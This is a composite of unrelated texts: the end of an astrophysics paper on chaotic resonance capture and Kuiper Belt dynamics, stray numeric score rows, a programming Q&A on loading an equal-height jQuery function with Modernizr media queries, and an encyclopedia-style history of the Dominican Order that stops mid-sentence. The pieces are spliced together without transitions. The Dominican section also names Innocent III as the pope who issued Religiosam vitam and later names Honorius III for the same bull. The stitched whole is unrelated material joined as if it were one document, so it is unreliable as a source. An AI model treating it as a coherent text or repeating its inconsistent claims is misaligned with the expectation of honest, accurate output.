the resonance. When the volume of the chaotic zone shrinks to zero we recover the formalism of the integrable model. Escape from the 2:1 resonance in the Kuiper Belt ------------------------------------------------ [@malhotra] proposed that Neptune’s outwards migration was responsible for the capture of Pluto and other Kuiper belt objects into the 3:2 and 2:1 mean-motion resonances with Neptune. Because the capture probability predicted with the integrable formalism is 1 for low eccentricity objects, particles are not expected to escape the 2:1 resonance. The existence of low eccentricity objects between 45-47 AU, just within the 2:1 resonance, has posed a challenge to explain. Nevertheless, the numerical simulations of the migrating major planets by [@malhotra] and [@hahn] showed that particles with initially low eccentricity could pass through this resonance. [@hahn] suggested that the stochastic migration rate of Neptune seen in their simulations might result in particles leaving the 2:1 resonance, however the simulation with a smooth migration by [@malhotra] still showed that low eccentricity particles could avoid capture. Numerical integrations have shown that on long timescales (4 Gyrs) the 2:1 is possibly entirely chaotic ([@renu2000]). Based on our understanding of our toy problems we may be able to offer an alternative explanation for passage of particles through the 2:1 resonance even when Neptune’s migration is smooth. The numerical simulations of the 2 dimensional toy model we discussed above were in the regime $\nu \sim \omega_0$ where $\omega_0 = \sqrt{K}$ (see equation (\[Ham\_2D\])). This regime is appropriate for the asteroid belt ([@holman]) and for the simulation of inwards orbital migration of a Jovian sized giant planet (as by [@quillen]). However in the Kuiper Belt secular oscillation frequencies are slow compared to the mean-motion resonance oscillation frequencies. If the simple model described by equation(\[Ham\_2D\]) were appropriate we would expect $\nu \ll \omega_0$ and that the resonances are highly overlapped. In this regime on long timescales the resonance is entirely chaotic. However, on short timescales we can consider the resonance to be a slowly varying integrable system. In this case we could use the formalism for calculating capture for slowly varying separatrices (e.g., [@haberman]; [@neishtadt]). Even though the secular oscillations frequencies are slow in the Kuiper belt, the edges of the resonances are still found numerically to exhibit chaotic motion even on the short timescales of millions of years (e.g., [@morbidelli], [@renu2000]). So the theory of capture in the regime of slowly varying separatrices, is still not applicable to the theory of capture by Kuiper Belt resonances. The numerical integrations (e.g. [@morbidelli] on the 3:2 and [@renu2000] on the 2:1 resonances) show that the problem is not as simple as a simple model of multiple resonances restricted to a few terms and that even on short timescales, the resonances contain fairly wide chaotic zones. When a resonance contains regions with widely different diffusion timescales, the problem is more complicated than illustrated with our simple 2D model explored above. However if the migration rate is fast compared to the diffusion timescale in a particular region of phase space, we can consider that region to be integrable. This is equivalent to modeling the resonance as a series of overlapped resonances with different frequencies, and ignoring the terms with the slowest frequencies. If a particle can remain in a region of libration for $10^6-10^7$ years then for orbital migration rates such that the resonance is passed on this timescale ($\Delta a/\dot{a} \sim 10^6-10^7$ years, for $\Delta a$ the width of the resonance and $\dot{a}$ the resonance migration rate) we can consider that region to be integrable, and so capable of capturing particles. For low initial particle eccentricities, $e_{init} < 0.1$, [@renu2000] found that about a fifth of phase space was likely to be chaotic in the 2:1 resonance on fairly short timescales. In other words, [@renu2000] found no regions of stable libration for about 1/5 of possible values for the resonant angle. Even though the integrable model predicts a 100% capture probability for $e_{init} < 0.06$, if 1/5 of the resonance is chaotic, then the capture probability is likely to be only $\sim 4/5$ for migration rates $\sim 10^6 - 10^7$ years. This is one way that low eccentricity objects could pass through the 2:1 resonance, and a possible explanation for low eccentricity Kuiper Belt objects between 45-47 AU which should have been previously captured in the 2:1 resonance by Neptune’s migration. Following a period of fairly swift migration, it is likely that Neptune underwent migration at a slower rate. For slower migration rates we can consider a larger fraction of the 2:1 resonance to be chaotic and the capture probability will be even smaller. Particles pumped to high eccentricity while caught in the resonance, can subsequently escape. In our previous simulations ([@quillen]) we saw that particles could be temporarily captured, have their eccentricities increase while in the resonance and then could escape with eccentricities that were not neccessarily well above their initial value. Any objects released at high eccentricity from the 2:1 resonance in the Kuiper Belt would not be observed today. Because of their high eccentricities, following escape from the resonance they would be likely to suffer encounters with Neptune. Low eccentricity particles which escaped the 2:1 resonance are likely to remain in stable orbits for the age of the solar system. The remaining objects we expect to find today should either reside in stable high eccentricity regions of the 2:1 resonance or at low eccentricity inside the semi-major axis of this resonance. As the observational constraints on the orbital elements of Kuiper Belt objects improve, we expect it will be possible to numerically explore the validity of this kind of scenario. Because of the different different diffusion timescales in the resonance, such a study may provide constraints on Neptune’s migration rate as a function of time. The Four Dimensional Analogy ============================ The celestial dynamics problem restricted to the plane containing the planet and sun is a 4 not 2 dimensional problem. Oscillations in semi-major axis are coupled to those in eccentricity. While a particle is temporarily captured into a resonance, large excursions in eccentricity can also take place (as discussed by [@tittemore] and [@dermott]). To illustrate what happens in the 4 dimensional system we explore a toy model with Hamiltonian similar to that given in equation (27) of [@murray97] $$\begin{aligned} H(P,\psi;I,\phi) &=& {1 \over 2} P^2 + K I^q \left[1 + a \cos(\phi)\right]\cos(\psi) + b P + \nu I \\ &=& {1 \over 2} P^2 + K I^q \left[\cos(\psi) + {a\over 2} \cos(\psi + \phi) + {a\over 2} \cos(\psi - \phi) \right] + b P + \nu I \nonumber\end{aligned}$$ In the celestial dynamics problem, $I$ is primarily related to the eccentricity of the particle, $P$ to the semi-major axis, $\psi$ corresponds to resonant angle and $\phi$ to the longitude of perihelion. $\nu$ corresponds to the precession frequency and is given by secular theory, and $q$ depends on the order of the resonance. In the celestial dynamics problem, $K$ and $a$ instead of being constants would be functions of the semi-major axis or $P$. If we do a cannonical transformation to variables $\Gamma =kI$; $\theta = (\psi-\phi)/k$ for $k=2q$ then we recover a Hamiltonian in the form $H \propto {1\over 2} \Gamma^2 + b' \Gamma + K' \Gamma^{k/2} \cos(k\theta) + ..$. This Hamitonian is the integral model often used to estimate capture probabilities into k’th order mean-motion resonances (e.g., [@henrard]; [@malhotra88]; [@borderies]; [@MD]). An integration of the 4 dimensional Hamiltonian given above with initial conditions $I=1$ so that it is close analogy with the two dimensional analog discussed above, yields phenomenology (see Figure 4) remarkably similar to that we observed in our orbital migration numerical integrations ([@quillen]). We see in Figure 4 that when temporary capture takes places there tends to be an increase in the mean value of $I$. After capture $I_{mean} \sim (H_0-1/2P_0^2)/\nu$ where $H_0$ is the value of the Hamiltonian and $P_0$ is the centre of the resonance when capture takes place. Since excursions in $I$ can take place, resulting in a wider resonance, particles can remain in the resonance for longer times than possible in the two dimensional analog. The resulting momentum probability distributions are broader (shown in Figure 5), particularly when the migration rates are slow. Because $I$ is related to the particle eccentricity, excursions in $I$ represent excursions in eccentricity which could result in catastrophic events such as encounters with a planet or star. If the eccentricity undergoes a random walk once a particle is captured into the resonance (as discussed in the diffusion model by [@murray97]), then when the capture time is long compared to the diffusion timescale, catastrophic events would be more likely to occur. In this situation the dynamics would be strongly dependent upon the planet’s orbital migration rate. [@murray97] discusses the diffusion timescale in terms of the Lyapunov time which for the simulations shown in Figures 4 and 5 is $T_L \sim 2\pi$. The slower drift rate integrations shown in Figure 5 represent cases where particles are trapped for many Lyapunov times. This may explain why their final momentum probability distributions exhibit larger tails. We now discuss the phenomenology seen in our previous numerical simulations ([@quillen]). Though initial particle eccentricities were fairly low, $e_{init} \sim 0.1$, because we chose planet eccentricities of $e_p = 0.3$ for many of the simulations, the forced eccentricities were high and the mean initial eccentricities tended to be $\sim 0.05-0.3$. The integrable model ([@malhotra88]) predicts a 100% capture probability for a Jupiter mass planet into the 3:1 resonance for eccentricities less than $\epsilon < 0.07$. Therefore we expect fairly low permanent capture probabilities of $0.2-0.5$ into this resonance ([@borderies]). For the 3:1 mean-motion resonance with a Jovian sized planet, the Lyapunov timescale (which is related to the secular oscillation frequency, [@holman]) is about $10^3$ times the planet period. For a resonance width that is about 0.02 the radius of the planet, we expect temporary capture to last a time of $2 \times 10^4$ planet periods which is only 20 Lyapunov times for a migration rates $D_a \equiv P \dot{a}/a = 10^{-6}$ given in units of the initial planet orbital period. For most of the simulations, temporary capture times were fairly short and deviations in eccentricity caused by temporary capture into the chaotic zone were limited. We also did 2 simulations with slower migration rates of $D_a = 3 \times 10^{-7}$. In these simulations particles are expected to remain in the chaotic zone for longer, $\sim 60$ Lyapunov times. In the slower migration simulations we saw more examples of resonances temporarily capturing particles. The probability of capture into the 3:1 (including temporary captures) was larger than that predicted from the integrable theory (using rough numbers from Table 2 of [@quillen]). The simulations showed that some of the temporary captures resulted in catastrophic events such as encounters with the planet or star. As expected from the final momentum distributions shown in Figure 5, in the slower simulations, the passage of the resonances heated the eccentricities and semi-major axis distribution to a larger extent than in the faster migration rate simulations. We conclude that the chaotic zone in is likely to have the strongest affect for slow migration rates. We expect large deviations from the predictions of integrable capture theories when the chaotic zone is large and the migration rates is sufficiently long that many Lyapunov times pass while particles are temporarily captured in the resonance. In the simulations shown in Figures 4 and 5, because $K$ and $a$ are constants, the size of the resonance does not change as $P$ varies. If we allowed $K$ and $a$ to be functions of $P$ we could allow the size of the resonant islands to grow as the resonance drifts. This would then would allow the integrable islands in the resonance to capture particles for longer periods of time. The separation between overlapping resonances (here described by $\nu$) is given by secular theory (e.g., [@holman]) and so will not vary quickly once a particle is trapped in one of the integrable islands. However, as the eccentricity grows, the widths of the individual sub-resonances will also grow and the resonances will overlap to a larger degree. We therefore expect the size of the chaotic region to grow after a particle is trapped in the resonance. Because the volume in the integrable islands will at some time shrink instead of growing, particles will eventually escape the resonance. This provides a complete analogy for the process of resonant capture and escape that we saw in our previous simulations ([@quillen]). Summary and Discussion ====================== By exploring toy Hamiltonian systems we have shown how the capture process is fundamentally different for drifting chaotic resonances than for drifting integrable systems. Previous theoretical work on resonant capture has been limited to integrable models. In this paper, we have illustrated how an understanding of the structure in phase space of a resonance can be used to generalize this integrable theory to include the richer phenomenology of a chaotic resonance. 1\) We have shown that particles are temporarily captured into the chaotic zone of a drifting resonance. For a resonance of fixed shape, the capture time depends on the effective width of the zone and the drift rate. In fact, temporary capture will take place even when the resonant width is shrinking. This is not true in the case of an integrable resonance. 2\) The permanent capture probability of a resonance depends on the ratio of phase space volume growth rate in its integrable islands compared to that swept up by the resonance. This implies that permanent capture probabilities are lower for resonances containing larger chaotic zones than those estimated from drifting integrable models. This offers a possible explanation for the passage of particles through the 2:1 resonance in the Kuiper Belt following migration by Neptune, and for the temporary captures seen in our previous simulations ([@quillen]). The continued migration of a planet via ejection of planetesimals depends on the fraction of particles remaining after a strong resonance has swept through the disk. Since catastrophic events such as close encounters with a planet or star can take place during temporary resonant capture, and because particles are more likely to escape drifting chaotic resonances, the dynamics of migrating systems may be strongly influenced by this process. We expect the largest deviations from the predictions of integrable capture theories when the chaotic zones are large and migration rates are sufficiently long that many Lyapunov times pass while particles are temporarily captured in the resonance. 3\) The passage of chaotic resonances results in a heating of the particle momentum distribution. The momentum distribution width is increased by the effective momentum width of the chaotic zone. The final momentum distribution shape is dependent on the drift rate. In this work we have numerically explored some simple drifting Hamiltonian systems. We suspect that the final momentum distributions of a drifting chaotic resonance is sensitive to the the distribution of diffusion times in the resonance. One way to explore this possibility would be to numerically investigate toy models with different structure in their chaotic zones. In future, by exploring in detail the timescales and structure of solar systems resonances, and comparing the results of numerical simulations with the observed distribution of objects, we suspect that the form of orbital migration of the planets may be constrained. The study of drifting chaotic resonances will also be applied to other fields. Resonances play an important role in the stellar theory of dynamical friction. The possibility that additional heating can be caused by chaotic resonances has not yet been explored. The brightness of some zodiacal and Kuiper Belt dust belts depends on the lifetime for dust particles to remain in resonances. We expect that studies which take into account the phase space structure of solar system resonances may be used to derive better estimates for the lifetime of dust particles in these belts. This work could not have been carried out without helpful discussions with Matt Holman, Renu Malhotra, Bruce Bayly, Andy Gould, Mark Sykes, Elizabeth Holmes, and John Stansberry. Support for this work was provided by NASA through grant numbers GO-07886.01-96A and GO-07868.01-96A from the Space Telescope Institute, which is operated by the Association of Universities for Research in Astronomy, Incorporated, under NASA contract NAS5-26555. Borderies, N., & Goldreich, P. 1984, Celestial Mechanics, 32, 127 Dermott, S. F., Malhotra, R., Murray, C. D. 1988, Icarus, 76, 295 Hahn, J. M., & Malhotra, R. 1999, AJ, 117, 3041 Henrard, J. 1982, Celestial Mechanics, 27, 3 Henrard, J. & Lemaitre, A. 1983, Celestial Mechanics, 30, 197 Haberman, R., & Ho, E. K. 1995, Chaos, 5, 374 Holman, M. J., & Murray, N. W. 1996, AJ, 112, 127 Malhotra, R. 2000, private communication Malhotra, R. 1995, AJ, 110, 420 Malhotra, R. 1988, Cornell University, PhD Thesis Morbidelli, A. 1997, Icarus, 127, 1 Murray, C. D. & Dermott, S. F. 1999, Solar System Dynamics, Cambridge University Press, Cambridge, UK Murray, N., Hansen, B., Holman, M., & Tremaine, S. 1998, Science, 279, 69 Murray, N., Holman, M., & Potter, M. 1998, AJ, 116, 2583 Murray, N., & Holman, M. 1997, AJ, 114, 1246 Neishtadt, A. I., Sidorenko, V. V., Treschev, D. V.1997, Chaos, 7, 2 Quillen, A. C., & Holman M. J. 2000, AJ, 119, 397 Tittemore, W. C., & Wisdom, J. 1990, Icarus, 85, 394 Wisdom, J. 1985, Icarus, 63, 272 Yoder, C. 1979, Celest. Mech., 19, 3 | Mid | [
0.654731457800511,
32,
16.875
] |
Q: Conditionally loading javascript in responsive design I'm trying to do something that I think should be pretty straightforward but I have not found a straightforward explanation of the solution. I am building a responsive website that is mobile first (320px width as the default). At that small resolution, the site is one column and I am happy to allow each individual "box" to expand or contract to the natural height of the contents contained inside. However, at larger resolutions where the site expands to three columns, I want to add a small Javascript function to equalize the heights of the boxes of each column. The function I am talking about would be something like this: jQuery(document).ready(function() { setHeight('#inner-footer .widget-area'); }); var maxHeight = 0; function setHeight(column) { //Get all the element with class = col column = $(column); //Loop all the column column.each(function() { //Store the highest value if($(this).height() > maxHeight) { maxHeight = $(this).height();; } }); //Set the height column.height(maxHeight); } I've found different ways to do what I'm talking about. I can use the modernizr "load" function (formally yesnope.js). Using a custom function that incorporates Nicholas Zakas "isMedia" function as described in this link Media Specific Javascript or a custom javascript function using the the "screenWidth" variable as in var screenWidth = (screen.width < 768) ? true : false; as described in Media queries in the real world With my limited javascript knowledge, I have been unable to actually write the code to get any of these approaches to work for my script. Can anyone help me out here? I have no particular preference for approach I just want it to work cross browser, etc. My sense is that the modernizr approach is the most robust and stable way to make this work in the greatest number of use cases but I'm not totally sure of that. I've never modified modernizr so I'm unsure of how to write and where to put the custom load function. Anyone have thoughts and specific code for the modernizr approach or any of the other solutions (or something else)? I greatly appreciate the assistance. A: Modernizr can check that media queries apply with the Modernizr.mq() function You pass it your media query that you want it to match like this if(Modernizr.mq('all and (min-width: 768px)')) { // Equal height code here } Here once the min width is past 768px then the code inside the function would be called, so for you the equal height code. | Mid | [
0.606334841628959,
33.5,
21.75
] |
Dominican Order The Order of Preachers (, postnominal abbreviation OP), also known as the Dominican Order, is a mendicant Catholic religious order founded by the Spanish priest Dominic of Caleruega (also called Dominic de Guzmán) in France, approved by Pope Innocent III via the Papal bull Religiosam vitam on 22 December 1216. Members of the order, who are referred to as Dominicans, generally carry the letters OP after their names, standing for Ordinis Praedicatorum, meaning of the Order of Preachers. Membership in the order includes friars, nuns, active sisters, and affiliated lay or secular Dominicans (formerly known as tertiaries, though recently there has been a growing number of associates who are unrelated to the tertiaries). __TOC__ Founded to preach the Gospel and to oppose heresy, the teaching activity of the order and its scholastic organisation placed the Preachers in the forefront of the intellectual life of the Middle Ages. The order is famed for its intellectual tradition, having produced many leading theologians and philosophers. In the year 2018 there were 5,747 Dominican friars, including 4,299 priests. The Dominican Order is headed by the Master of the Order, as of 2019, Gerard Timoner III. Mary Magdalene and Catherine of Alexandria are the co-patronesses of the Order. A number of other names have been used to refer to both the order and its members. In England and other countries, the Dominican friars are referred to as "Black Friars" because of the black cappa or cloak they wear over their white habits. Dominicans were "Blackfriars", as opposed to "Whitefriars" (i.e., Carmelites) or "Greyfriars" (i.e., Franciscans). They are also distinct from the "Austin friars" (i.e., Augustinian Friars) who wear a similar habit. In France, the Dominicans were known as "Jacobins" because their convent in Paris was attached to the Church of Saint-Jacques, now disappeared, on the way to Saint-Jacques-du-Haut-Pas, which belonged to the Italian Order of Saint James of Altopascio (James the Less) Sanctus Iacobus in Latin. Their identification as Dominicans gave rise to the pun that they were the "Domini canes", or "Hounds of the Lord". Foundation The Dominican Order came into being in the Middle Ages at a time when men of God were no longer expected to stay behind the walls of a cloister. Instead, they travelled among the people, taking as their examples the apostles of the primitive Church. Out of this ideal emerged two orders of mendicant friars: one, the Friars Minor, was led by Francis of Assisi; the other, the Friars Preachers, by Dominic of Guzman. Like his contemporary, Francis, Dominic saw the need for a new type of organization, and the quick growth of the Dominicans and Franciscans during their first century of existence confirms that the orders of mendicant friars met a need. argues the Dominicans and other mendicant orders were an adaptation to the rise of the profit economy in medieval Europe. Dominic sought to establish a new kind of order, one that would bring the dedication and systematic education of the older monastic orders like the Benedictines to bear on the religious problems of the burgeoning population of cities, but with more organizational flexibility than either monastic orders or the secular clergy. The Order of Preachers was founded in response to a then perceived need for informed preaching. Dominic's new order was to be trained to preach in the vernacular languages. Dominic inspired his followers with loyalty to learning and virtue, a deep recognition of the spiritual power of worldly deprivation and the religious state, and a highly developed governmental structure. At the same time, Dominic inspired the members of his order to develop a "mixed" spirituality. They were both active in preaching, and contemplative in study, prayer and meditation. The brethren of the Dominican Order were urban and learned, as well as contemplative and mystical in their spirituality. While these traits affected the women of the order, the nuns especially absorbed the latter characteristics and made those characteristics their own. In England, the Dominican nuns blended these elements with the defining characteristics of English Dominican spirituality and created a spirituality and collective personality that set them apart. Dominic of Caleruega As an adolescent, he had a particular love of theology and the Scriptures became the foundation of his spirituality. During his studies in Palencia, Spain, he experienced a dreadful famine, prompting Dominic to sell all of his beloved books and other equipment to help his neighbours. After he completed his studies, Bishop Martin Bazan and Prior Diego d'Achebes appointed Dominic to the cathedral chapter and he became a Canon Regular under the Rule of Saint Augustine and the Constitutions for the cathedral church of Osma. At the age of twenty-four or twenty-five, he was ordained to the priesthood. Preaching to the Cathars In 1203, Dominic de Guzmán joined Diego de Acebo on an embassy to Denmark for the monarchy of Spain, to arrange the marriage between the son of King Alfonso VIII of Castile and a niece of King Valdemar II of Denmark. At that time the south of France was the stronghold of the Cathar movement. The Cathars (also known as Albigensians, due to their stronghold in Albi, France) were a heretical neo-gnostic sect. They believed that matter was evil and only the spirit was good; this was a fundamental challenge to the notion of the incarnation, central to Catholic theology. The Albigensian Crusade (1209–1229) was a 20-year military campaign initiated by Pope Innocent III to eliminate Catharism in Languedoc, in southern France. Dominic saw the need for a response that would attempt to sway members of the Albigensian movement back to mainstream Christian thought. Dominic became inspired into a reforming zeal after they encountered Albigensian Christians at Toulouse. Diego immediately saw one of the paramount reasons for the spread of the unorthodox movement- the representatives of the Holy Church acted and moved with an offensive amount of pomp and ceremony. In contrast, the Cathars generally led ascetic lifestyles. For these reasons, Diego suggested that the papal legates begin to live a reformed apostolic life. The legates agreed to change if they could find a strong leader. The prior took up the challenge, and he and Dominic dedicated themselves to the conversion of the Cathars. Despite this particular mission, Dominic met limited success converting Cathars by persuasion, "for though in his ten years of preaching a large number of converts were made, it has to be said that the results were not such as had been hoped for". Dominican convent established Dominic became the spiritual father to several Albigensian women he had reconciled to the faith, and in 1206 he established them in a convent in Prouille, near Toulouse. This convent would become the foundation of the Dominican nuns, thus making the Dominican nuns older than the Dominican friars. Diego sanctioned the building of a monastery for girls whose parents had sent them to the care of the Albigensians because their families were too poor to fulfill their basic needs.> The monastery in Prouille would later become Dominic's headquarters for his missionary effort. After two years on the mission field, Diego died while traveling back to Spain. History Dominic founded the Dominican Order in 1215 at a time when men of God were no longer expected to stay behind the walls of a cloister. Dominic established a religious community in Toulouse in 1214, to be governed by the rule of Saint Augustine and statutes to govern the life of the friars, including the Primitive Constitution. (The statutes borrowed somewhat from the Constitutions of Prémontré). The founding documents establish that the order was founded for two purposes: preaching and the salvation of souls. Middle Ages Dominic established a religious community in Toulouse in 1214, to be governed by the rule of Saint Augustine and statutes to govern the life of the friars, including the Primitive Constitution. In July 1215, with the approbation of Bishop Foulques of Toulouse, Dominic ordered his followers into an institutional life. Its purpose was revolutionary in the pastoral ministry of the Catholic Church. These priests were organized and well trained in religious studies. Dominic needed a framework—a rule—to organize these components. The Rule of Saint Augustine was an obvious choice for the Dominican Order, according to Dominic's successor Jordan of Saxony, in the Libellus de principiis, because it lent itself to the "salvation of souls through preaching". By this choice, however, the Dominican brothers designated themselves not monks, but canons-regular. They could practice ministry and common life while existing in individual poverty. Dominic's education at Palencia gave him the knowledge he needed to overcome the Manicheans. With charity, the other concept that most defines the work and spirituality of the order, study became the method most used by the Dominicans in working to defend the Church against the perils that hounded it, and also of enlarging its authority over larger areas of the known world. In Dominic's thinking, it was impossible for men to preach what they did not or could not understand. When the brethren left Prouille, then, to begin their apostolic work, Dominic sent Matthew of Paris to establish a school near the University of Paris. This was the first of many Dominican schools established by the brethren, some near large universities throughout Europe. The women of the order also established schools for the children of the local gentry. The Order of Preachers was approved in December 1216 and January 1217 by Pope Honorius III in the papal bulls Religiosam vitam and Nos attendentes. On January 21, 1217, Honorius issued the bull Gratiarum omnium recognizing Dominic's followers as an order dedicated to study and universally authorized to preach, a power formerly reserved to local episcopal authorization. On August 15, 1217, Dominic dispatched seven of his followers to the great university center of Paris to establish a priory focused on study and preaching. The Convent of St. Jacques, would eventually become the order's first studium generale. Dominic was to establish similar foundations at other university towns of the day, Bologna in 1218, Palencia and Montpellier in 1220, and Oxford just before his death in 1221. In 1219 Pope Honorius III invited Dominic and his companions to take up residence at the ancient Roman basilica of Santa Sabina, which they did by early 1220. Before that time the friars had only a temporary residence in Rome at the convent of San Sisto Vecchio which Honorius III had given to Dominic circa 1218 intending it to become a convent for a reformation of nuns at Rome under Dominic's guidance. In May 1220 at Bologna the order's first General Chapter mandated that each new priory of the order maintain its own studium conventuale, thus laying the foundation of the Dominican tradition of sponsoring widespread institutions of learning. The official foundation of the Dominican convent at Santa Sabina with its studium conventuale occurred with the legal transfer of property from Honorius III to the Order of Preachers on June 5, 1222. This studium was transformed into the order's first studium provinciale by Thomas Aquinas in 1265. Part of the curriculum of this studium was relocated in 1288 at the studium of Santa Maria sopra Minerva which in the 16th century world be transformed into the College of Saint Thomas (). In the 20th century the college would be relocated to the convent of Saints Dominic and Sixtus and would be transformed into the Pontifical University of Saint Thomas Aquinas, Angelicum. The Dominican friars quickly spread, including to England, where they appeared in Oxford in 1221. In the 13th century the order reached all classes of Christian society, fought heresy, schism, and paganism by word and book, and by its missions to the north of Europe, to Africa, and Asia passed beyond the frontiers of Christendom. Its schools spread throughout the entire Church; its doctors wrote monumental works in all branches of knowledge, including the extremely important Albertus Magnus and Thomas Aquinas. Its members included popes, cardinals, bishops, legates, inquisitors, confessors of princes, ambassadors, and paciarii (enforcers of the peace decreed by popes or councils). The order's origins in battling heterodoxy influenced its later development and reputation. Many later Dominicans battled heresy as part of their apostolate. Indeed, many years after Dominic reacted to the Cathars, the first Grand Inquistor of Spain, Tomás de Torquemada, would be drawn from the Dominican Order. The order was appointed by Pope Gregory IX the duty to carry out the Inquisition. Torture was not regarded as a mode of punishment, but purely as a means of eliciting the truth. In his Papal Bull Ad extirpanda of 1252, Pope Innocent IV authorised the Dominicans' use of torture under prescribed circumstances. The expansion of the order produced changes. A smaller emphasis on doctrinal activity favoured the development here and there of the ascetic and contemplative life and there sprang up, especially in Germany and Italy, the mystical movement with which the names of Meister Eckhart, Heinrich Suso, Johannes Tauler, and Catherine of Siena are associated. (See German mysticism, which has also been called "Dominican mysticism".) This movement was the prelude to the reforms undertaken, at the end of the century, by Raymond of Capua, and continued in the following century. At the same time the order found itself face to face with the Renaissance. It struggled against pagan tendencies in Renaissance humanism, in Italy through Dominici and Savonarola, in Germany through the theologians of Cologne but it also furnished humanism with such advanced writers as Francesco Colonna (probably the writer of the Hypnerotomachia Poliphili) and Matteo Bandello. Many Dominicans took part in the artistic activity of the age, the most prominent being Fra Angelico and Fra Bartolomeo. Women Although Dominic and the early brethren had instituted female Dominican houses at Prouille and other places by 1227, houses of women attached to the Order became so popular that some of the friars had misgivings about the increasing demands of female religious establishments on their time and resources. Nonetheless, women's houses dotted the countryside throughout Europe. There were seventy-four Dominican female houses in Germany, forty-two in Italy, nine in France, eight in Spain, six in Bohemia, three in Hungary, and three in Poland. Many of the German religious houses that lodged women had been home to communities of women, such as Beguines, that became Dominican once they were taught by the traveling preachers and put under the jurisdiction of the Dominican authoritative structure. A number of these houses became centers of study and mystical spirituality in the 14th century, as expressed in works such as the sister-books. There were one hundred and fifty-seven nunneries in the order by 1358. After that year, the number lessened considerably due to the Black Death. In places besides Germany, convents were founded as retreats from the world for women of the upper classes. These were original projects funded by wealthy patrons, including other women. Among these was Countess Margaret of Flanders who established the monastery of Lille, while Val-Duchesse at Oudergem near Brussels was built with the wealth of Adelaide of Burgundy, Duchess of Brabant (1262). Female houses differed from male Dominican houses in that they were enclosed. The sisters chanted the Divine Office and kept all the monastic observances. The nuns lived under the authority of the general and provincial chapters of the order. They shared in all the applicable privileges of the order. The friars served as their confessors, priests, teachers and spiritual mentors. Women could be professed to the Dominican religious life at the age of thirteen. The formula for profession contained in the Constitutions of Montargis Priory (1250) requires that nuns pledge obedience to God, the Blessed Virgin, their prioress and her successors according to the Rule of Saint Augustine and the institute of the order, until death. The clothing of the sisters consisted of a white tunic and scapular, a leather belt, a black mantle, and a black veil. Candidates to profession were questioned to reveal whether they were actually married women who had merely separated from their husbands. Their intellectual abilities were also tested. Nuns were to be silent in places of prayer, the cloister, the dormitory, and refectory. Silence was maintained unless the prioress granted an exception for a specific cause. Speaking was allowed in the common parlor, but it was subordinate to strict rules, and the prioress, subprioress or other senior nun had to be present. As well as sewing, embroidery and other genteel pursuits, the nuns participated in a number of intellectual activities, including reading and discussing pious literature. In the Strassburg monastery of Saint Margaret, some of the nuns could converse fluently in Latin. Learning still had an elevated place in the lives of these religious. In fact, Margarette Reglerin, a daughter of a wealthy Nuremberg family, was dismissed from a convent because she did not have the ability or will to learn. English Province In England, the Dominican Province began at the second general chapter of the Dominican Order in Bologna during the spring of 1221. Dominic dispatched twelve friars to England under the guidance of their English prior, Gilbert of Fresney. They landed in Dover on August 5, 1221. The province officially came into being at its first provincial chapter in 1230. The English Province was a component of the international order from which it obtained its laws, direction, and instructions. It was also, however, a group of Englishmen. Its direct supervisors were from England, and the members of the English Province dwelt and labored in English cities, towns, villages, and roadways. English and European ingredients constantly came in contact. The international side of the province's existence influenced the national, and the national responded to, adapted, and sometimes constrained the international. The first Dominican site in England was at Oxford, in the parishes of St. Edward and St. Adelaide. The friars built an oratory to the Blessed Virgin Mary and by 1265, the brethren, in keeping with their devotion to study, began erecting a school. Actually, the Dominican brothers likely began a school immediately after their arrival, as priories were legally schools. Information about the schools of the English Province is limited, but a few facts are known. Much of the information available is taken from visitation records. The "visitation" was a section of the province through which visitors to each priory could describe the state of its religious life and its studies to the next chapter. There were four such visits in England and Wales—Oxford, London, Cambridge and York. All Dominican students were required to learn grammar, old and new logic, natural philosophy and theology. Of all of the curricular areas, however, theology was the most important. This is not surprising when one remembers Dominic's zeal for it. Dartford Priory was established long after the primary period of monastic foundation in England had ended. It emulated, then, the monasteries found in Europe—mainly France and German—as well as the monastic traditions of their English Dominican brothers. The first nuns to inhabit Dartford were sent from Poissy Priory in France. Even on the eve of the Dissolution, Prioress Jane Vane wrote to Cromwell on behalf of a postulant, saying that though she had not actually been professed, she was professed in her heart and in the eyes of God. This is only one such example of dedication. Profession in Dartford Priory seems, then, to have been made based on personal commitment, and one's personal association with God. As heirs of the Dominican priory of Poissy in France, the nuns of Dartford Priory in England were also heirs to a tradition of profound learning and piety. Strict discipline and plain living were characteristic of the monastery throughout its existence. Reformation to French Revolution Bartolomé de Las Casas, as a settler in the New World, was galvanized by witnessing the brutal torture and genocide of the Native Americans by the Spanish colonists. He became famous for his advocacy of the rights of Native Americans, whose cultures, especially in the Caribbean, he describes with care. Gaspar da Cruz (c.1520–1570), who worked all over the Portuguese colonial empire in Asia, was probably the first Christian missionary to preach (unsuccessfully) in Cambodia. After a (similarly unsuccessful) stint, in 1556, in Guangzhou, China, he eventually returned to Portugal and became the first European to publish a book devoted exclusively to China in 1569/1570. The beginning of the 16th century confronted the order with the upheavals of Revolution. The spread of Protestantism cost it six or seven provinces and several hundreds of convents, but the discovery of the New World opened up a fresh field of activity. In the 18th century, there were numerous attempts at reform, accompanied by a reduction in the number of devotees. The French Revolution ruined the order in France, and crises that more or less rapidly followed considerably lessened or wholly destroyed numerous provinces. 19th century to present During the early 19th century, the number of Preachers seems never to have sunk below 3,500. Statistics for 1876 show 3,748, but 500 of these had been expelled from their convents and were engaged in parochial work. Statistics for 1910 show a total of 4,472 nominally or actually engaged in proper activities of the order. By the year 2013 there were 6058 Dominican friars, including 4,470 priests. In the revival movement France held a foremost place, owing to the reputation and convincing power of the orator, Jean-Baptiste Henri Lacordaire (1802–1861). He took the habit of a Friar Preacher at Rome (1839), and the province of France was canonically erected in 1850. From this province were detached the province of Lyon, called Occitania (1862), that of Toulouse (1869), and that of Canada (1909). The French restoration likewise furnished many laborers to other provinces, to assist in their organization and progress. From it came the master general who remained longest at the head of the administration during the 19th century, Père Vincent Jandel (1850–1872). Here should be mentioned the province of Saint Joseph in the United States. Founded in 1805 by Edward Fenwick, afterwards first Bishop of Cincinnati, Ohio (1821–1832). In 1905, it established a large house of studies at Washington, D.C., called the Dominican House of Studies. The province of France has produced a large number of preachers. The conferences of Notre-Dame-de-Paris were inaugurated by Père Lacordaire. The Dominicans of the province of France furnished Lacordaire (1835–1836, 1843–1851), Jacques Monsabré, and Joseph Ollivier. The pulpit of Notre Dame has been occupied by a succession of Dominicans. Père Henri Didon (1840-1900) was a Dominican. The house of studies of the province of France publishes L'Année Dominicaine (founded 1859), La Revue des Sciences Philosophiques et Theologiques (1907), and La Revue de la Jeunesse (1909). French Dominicans founded and administer the École Biblique et Archéologique française de Jérusalem founded in 1890 by Marie-Joseph 